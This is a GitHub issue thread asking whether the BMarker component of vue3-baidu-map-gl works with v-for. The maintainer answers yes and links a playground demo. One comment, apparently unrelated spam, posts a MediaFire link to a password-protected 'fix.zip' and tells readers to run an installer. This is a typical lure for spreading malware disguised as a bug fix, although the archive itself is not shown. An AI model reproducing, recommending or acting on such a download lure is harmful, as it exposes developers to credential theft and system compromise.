### ISSUE TITLE
BMarker 不能使用v-for吗？ 

### ISSUE THREAD

**Issue by huxiguo** [yue1123/vue3-baidu-map-gl#85]
**Describe the bug** A clear and concise description of what the bug is.

**To Reproduce** Steps to reproduce the behavior:

**Expected behavior** A clear and concise description of what you expected to happen.

**Screenshots** If applicable, add screenshots to help explain your problem.

**Desktop (please complete the following information):**

**Smartphone (please complete the following information):**

**Additional context** Add any other context about the problem here.

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yue1123** [comment]
可以使用，[demo](https://play.vuejs.org/#eNqtVc2O40QQfpXGCK0E47bbdvwTAlrGWkbDMvxlJNAqF8fuJD2xu612529n8xDcQHDmiDiDWF6G0b4G1W1nkszMLntYKbKqqr+q+qqrq3JtfVbXeLmgVt8aKFrVZabopyOO0KBgSyOA+J5to3//+ufVzy9v/vzt5tc/bn55efP7T6/+/hHZ9g5zepHVaMUKNftkZBHX/WBkoRll05lq9eUMDNkclLm/PLv8dji+WD0tZj+wz5+eybPh/Hk5vxzW8dmiBhzl2bikw1yKsvx+Rmn5TIgKSToB9yoDRJsUoX5OuaISzNcIqPeRn+CE9EjcO0Eln/YRISEOXD9xCdqiFy/Qghd0wjgtRlbHvOUu51SipT0ROhaDm0CMI+ICl/6cbjqb1p6fQ4Q1GJJkTwOI1KJhign+ABX0ETIRP0Qudsl9YkfHaAtZWG4CNSqTClRnd8mOvuW2PU7bn4Fz0DVQm1yyWgEBPoUAqgHvhqqFdmJVLaRC19pdxznpBF06yFs0kXDJj+Ax+PY4Y8XChqu2p+UjnaWN2+VQm1KnG4ti04arMjllvI/cjyGOgXcQ68Rq0+pY+KoRHB6acYEbNQfAsN8G0TZIrvWRNVOqbvqOkxcc3ApasqXEnCqH15XzGGCOXHDFKmoXonrsYx8HcCONOjRj2lT2WIpVQyUEGVmm4i6NA8Yllbak0E9J5dumveN2mPrO0evTFxueVSxvjPVu2ma+qbN8jgu6dI6Ah+yPO/QW3O/5tJSZfsyaqMmgE0D7ttC1L0We6ed8Di/xgf0wUoNmOd3Pe3g07VpbMro6FXpQXOSiIIYfWCesLMHEBYc+o3VV8gZUzRyIr1YrvPKxkFPHc13XgQwwpYM6UzNUAOwiwXEvikPkezjqRUEaYs+PezHyfRwHvocC5Pew30lRGqDAxT7xI0Q8nPQCH8HPA6ufAs4NepE2BHsYiNrtIAzBUUhA7xL4MSaBR3YE9HApKeYUyL0fhrrsVrd3F7OH2CVsnTyrwTheKD3VB/YrwfS8SwHraWQ5hzUDX7+Xmi+QQ16Ie66miWB/hDGJUxATHEZRDFaCSZRAHabKFBCx50KFsGxuMSDuPEHswrXhzffZvS7tS0z0zvufEt9ciuelkNLcqechL0Ek6TQQo1R/A93UUDMzBwRg+pt6pD0AA9nDtBil+rsL1MF0eJ3kndejn+Xx4oVxUQ3MyYRN76y4XFQ1K6n8utazdLzqsrIUqy+MTckFvZ3ufEbz+QP2q2bdzvk3kppNc7AR4H9iSuFN6eMnw6/oGuTbw0oUi7Jbq685/I42olxoji3sFIoF2gc4w/bcbGzGp5fNk7WivNkVpYma5WHwZkOlbyh9Txe25+3S2f4HeYyevQ==)
